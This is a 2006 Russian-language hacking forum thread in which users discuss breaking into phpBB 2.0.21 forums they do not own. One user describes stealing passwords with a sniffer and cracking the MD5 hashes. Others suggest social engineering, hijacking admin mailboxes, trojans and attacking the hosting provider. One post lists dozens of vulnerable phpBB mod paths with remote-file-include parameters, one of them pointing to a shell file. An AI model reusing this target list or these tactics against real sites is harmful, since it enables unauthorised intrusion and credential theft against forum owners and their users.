Форумы Прости господа, но phpBB 2.0.21 что универсальна?!

Discussion in 'Уязвимости CMS/форумов' started by oxigen, 19 Nov 2006.

  1. oxigen

    oxigen New Member

    Joined:
    19 Dec 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Нет, вот не понимаю, что phpBB 2.0.21 невзломать?! Не уж-то phpBB 2.0.21 совсем не баговая? если я не прав кините эксплойты и сниферы сюда.
     
  2. r2d2

    r2d2 Member

    Joined:
    11 Nov 2005
    Messages:
    18
    Likes Received:
    5
    Reputations:
    1
    ща ..вон все кинулись кидать тебе всё ... да есть эксплойты, кто сам пишет, кто находит... но пока что они весьма актуальны потому тебе их никто не даст ... ну разве что за определённую сумму ...
     
  3. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Ну дай что ли за определенную сумму =)

    Эта весчь работает, но нужны права админа
     
    #3 syntacsis, 20 Nov 2006
    Last edited: 20 Nov 2006
  4. -Bart-

    -Bart- New Member

    Joined:
    25 Apr 2006
    Messages:
    11
    Likes Received:
    3
    Reputations:
    1
    Я получил 2 пароля от форума 2.0.21 кодом для версии 2.0.18. Пароли на сниффер пришли в MD5. Разшифровал и всё. Вот кукисы админа боюсь доставать, т.к. у него Опера, а Опера палит всю контору даже если поставить.
     
    2 people like this.
  5. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6


    Вот ты фантазёр =)))))
     
  6. -Bart-

    -Bart- New Member

    Joined:
    25 Apr 2006
    Messages:
    11
    Likes Received:
    3
    Reputations:
    1
    Хм... пароль я придумал и чудом подошло? Проверил с человеком, дак он поставил пароль "cscs", на снифер пришло - c071bd38e4c31ed73ec02faa32b52e4a .
     
  7. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Раз уж пошел флейм в этой теме, рассказывай -Bart- , что ты делал от начала до конца с подробностями. Как ты увел пароль в md5, про кукисы, про оперу, про снифер и т.д.
     
  8. -Bart-

    -Bart- New Member

    Joined:
    25 Apr 2006
    Messages:
    11
    Likes Received:
    3
    Reputations:
    1
    о_О Тоже самое, что и для 2.0.18. Думаю, врядли админам надо изменят приписку 2.0.18 на 2.0.21 => версия 2.0.21... Может я и не прав, но написал так, как всё было.
     
  9. -Bart-

    -Bart- New Member

    Joined:
    25 Apr 2006
    Messages:
    11
    Likes Received:
    3
    Reputations:
    1
    Извиняйте, но вроде версия не 2.0.21... Я уже ничего не понимаю... http://www.mxc.ru/forum
     
  10. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Это 2.0.6 :)
     
  11. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Всего лишь надпись на заборе....
    Тут же есть темы, где написано, как определить версию форума


    А без админского пароля на 2.0.21 ничего не сделаешь...
    Все сплоиты и статьи на 21 версию заточены как раз на этот пароль. Не зная его, ничего не сделать. И даже за деньги :D

    Как вариант, использовать уязвимости хаков. Например, Attachment mod...
     
    #11 Basurman, 21 Nov 2006
    Last edited: 21 Nov 2006
  12. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Это почему ж ничего не сделаешь? А СИ? А админский почтовый ящик? Если его знать, то можно попробовать получить к нему доступ. А пинч? Да и кроме того у phpbb полно модов дырявых к которым есть в паблике сплоиты. Можно и в этом направлении поработать
     
  13. Moscow

    Moscow Member

    Joined:
    21 Nov 2006
    Messages:
    14
    Likes Received:
    5
    Reputations:
    6
    А в чём там уязвимость ? :confused:
    Не кините ссылочку ? :)
     
  14. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Ссылочка есть только на уязвимость старой версии этого мода. Нет смысла ее кидать
     
  15. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    Пратически по теме, у кого есть сплоит определения версии у пхпбб, я свой утерял... мож кто кинет, тока не киборга, так как он вроде не пахал....
     
    1 person likes this.
  16. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Версию phpbb можно определять только по косвенным признакам. Сплоиты которые ее определяли через docs/CHANGELOG.html бесполезны и даже могут дать неверную инфу. CHANGELOG.html - это не документ с собщением о версии данного форума. Это версия форума на момент установки, не более. Да и у нормальных админов этот документ удален
     
  17. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    насчет уязвимостей хаков, модификаций пхпбб.. там чаще всего можно повстречать уязвимости типа удаленный инклуд, есть достаточно много эдвайзори и сплойтов по этой теме.. я, по сводкам багтрака и, просмотрев в свое время кучу сплоитов для модов пхпбб на милворме, составил этакий файлик уязвимых сценариев и пополняю его время от времени:
    Code:
    TopList Hack for PHPBB <= 1.3.8		/toplist.php?f=toplist_top10&phpbb_root_path=
    Advanced GuestBook			/admin/addentry.php?phpbb_root_path=
    Knowledge Base Mod			/includes/kb_constants.php?module_root_path=
    phpBB auction mod			/auction/auction_common.php?phpbb_root_path=
    phpRaid <= 3.0.b3			/[phpraidpath]/auth/auth.php?phpbb_root_path=									/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=
    					/[phpraidpath]/auth/auth.php?smf_root_path=
    					/[phpraidpath]/auth/auth_SMF/smf_root_path=
    PafileDB				/[pdbpath]/includes/pafiledb_constants.php?module_root_path=
    Foing <= 0.7.0				/index.php?phpbb_root_path=
    					/song.php?phpbb_root_path=
    					/faq.php?phpbb_root_path=
    					/list.php?phpbb_root_path=
    					/gen_m3u.php?phpbb_root_path=
    					/playlist.php?phpbb_root_path=
    Activity MOD Plus			/language/lang_english/lang_activity.php?phpbb_root_path=
    Blend Portal <= 1.2.0			/blend_data/blend_common.php?phpbb_root_path=
    Minerva <= 2.0.8a			/stat_modules/users_age/module.php?phpbb_root_path=
    Minerva <= v238				/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
    FlashBB <= 1.1.5			/phpbb/getmsg.php?phpbb_root_path=
    HoRCMS <= 1.3.1				/includes/functions_cms.php?phpbb_root_path=
    mail2forum <= 1.2			/m2f/m2f_phpbb204.php?m2f_root_path=
    					/m2f/m2f_forum.php?m2f_root_path=
    					/m2f/m2f_mailinglist.php?m2f_root_path=
    					/m2f/m2f_cron.php?m2f_root_path=
    WoW Roster				/[roster_path]/lib/phpbb.php?subdir=
    Integramod Portal			/includes/functions_mod_user.php?phpbb_root_path=
    					/includes/functions.php?phpbb_root_path=
    Shadow Premod <= 2.7.1			/includes/functions_portal.php?phpbb_root_path=				
    phpBB XS <= 0.58			/includes/functions_kb.php?phpbb_root_path=
    					/includes/bbcb_mg.php?phpbb_root_path=
    					/includes/functions.php?phpbb_root_path=
    pnphpbb					/includes/functions_admin.php?phpbb_root_path=
    Admin Topic Action Logging		/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
    phpBB Static Topics <= 1.0		/includes/functions_static_topics.php?phpbb_root_path=
    Security Suite IP Logger		/includes/logger_engine.php?phpbb_root_path=
    Dimension of phpBB			/includes/themen_portal_mitte.php?phpbb_root_path=
    					/includes/logger_engine.php?phpbb_root_path=
    					/includes/functions.php?phpbb_root_path=
    phpBB User Viewed Posts Tracker		/includes/functions_user_viewed_posts.php?phpbb_root_path=
    phpBB RANDOm USER REGISTRATION NUMBER	/includes/functions_num_image.php?phpbb_root_path=
    phpBB insert user <= 0.1.2		/includes/functions_mod_user.php?phpbb_root_path=
    phpBB Import Tools Mod <= 0.1.4		/includes/functions_mod_user.php?phpbb_root_path=
    phpBB Ajax Shoutbox <= 0.0.5		/shoutbox.php?phpbb_root_path=
    SpamBlockerMOD <= 1.0.2			/root/includes/antispam.php?phpbb_root_path=
    phpBB PlusXL 2.x <= biuld 272		/mods/iai/includes/constants.php?phpbb_root_path=
    AMAZONIA MOD				/zufallscodepart.php?phpbb_root_path=
    news defilante horizontale <= 4.1.1	/franзais/root/includes/functions_newshr.php?phpbb_root_path=
    phpBB lat2cyr <= 1.0.1			/lat2cyr.php?phpbb_root_path=
    SpamOborona PHPBB Plugin		/admin/admin_spam.php?phpbb_root_path=
    RPG Events 1.0.0			/functions_rpg_events.php?phpbb_root_path=
    phpBB archive for search engines	/includes/archive/archive_topic.php?phpbb_root_path=
    PhpBB Prillian French			/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
    phpBB ACP User Registration Mod 1.00	/includes/functions_mod_user.php?phpbb_root_path=
    phpBB Security <= 1.0.1			/phpbb_security.php?phpbb_root_path=
    phpBBFM version 206-3-3			/language/lang_english/lang_prillian_faq.php?phpbb_root_path=
    Fully Modded phpBB 2			/faq.php?foing_root_path=sh3ll.txt?
    					/index.php?foing_root_path=
    					/list.php?foing_root_path=
    					/login.php?foing_root_path=
    					/playlist.php?foing_root_path=
    					/song.php?foing_root_path=
    					/gen_m3u.php?foing_root_path=
    					/view_artist.php?foing_root_path=
    					/view_song.php?foing_root_path=
    					/login.php?foing_root_path=
    					/playlist.php?foing_root_path=
    					/song.php?foing_root_path=
    					/flash/set_na.php?foing_root_path=
    					/flash/initialise.php?foing_root_path=
    					/flash/get_song.php?foing_root_path=
    					/includes/common.php?foing_root_path=
    					/admin/nav.php?foing_root_path=
    					/admin/main.php?foing_root_path=
    					/admin/list_artists.php?foing_root_path=
    					/admin/index.php?foing_root_path=
    					/admin/genres.php?foing_root_path=
    					/admin/edit_artist.php?foing_root_path=
    					/admin/edit_album.php?foing_root_path=
    					/admin/config.php?foing_root_path=
    					/admin/admin_status.php?foing_root_path=
    Spider Friendly <= 1.3.10		/admin/modules_data.php?phpbb_root_path=
    		
    не знаю, мож кому пригодится, мне такие инклуды всего пару раз помогли..
     
    1 person likes this.
  18. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    гыгыгы веселый парень, хз я это знал, мне требуется сплоит, хотя он вроде тем же тыком работает, прсот охочется автоматизировать, да прятнее работать в ком строке
     
  19. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Ну то что ты знал это хорошо, а обычно это самая частая ошибка
    Вот за списочек спасибо. Очень не помешает
     
  20. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Ну это все косвенно... Я имел ввиду, что средствами форума это не сделать без пароля... Можно ж поломать хостера до кучи :) Упадут сразу все форумы
    Я это и писал. Если еще актуально: _http://www.securitylab.ru/vulnerability/273545.php
    2.4.5 в середине сентября вышел. Сейчас проект закрыт...